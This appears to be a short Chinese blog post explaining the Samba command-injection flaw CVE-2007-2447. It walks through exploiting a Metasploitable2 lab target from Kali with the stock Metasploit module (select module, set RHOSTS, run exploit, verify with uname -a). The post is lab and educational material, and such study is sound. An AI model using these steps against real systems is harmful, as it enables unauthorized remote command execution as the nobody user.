Samba远程Shell命令注入执行漏洞

Posted 念念不忘,必有回响。

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Samba远程Shell命令注入执行漏洞相关的知识,希望对你有一定的参考价值。

CVE:CVE-2007-2447

原理:

Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。

 

漏洞利用:

攻击机 kali
IP 192.168.129.133

靶机 Metasploitable2
IP 192.168.129.128

 

msf中搜索samba

use 13 选择漏洞

show options 查看选项

set RHOSTS 设置要攻击的ip

exploit 开始攻击

之后uname -a验证

 

以上是关于Samba远程Shell命令注入执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章

php命令注入函数及dvwa命令注入实践

Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)

常见WEB攻击之命令注入

PHP漏洞全解-命令注入攻击

命令注入和一个分享

CVE-2020-15778 Openssh命令注入漏洞复现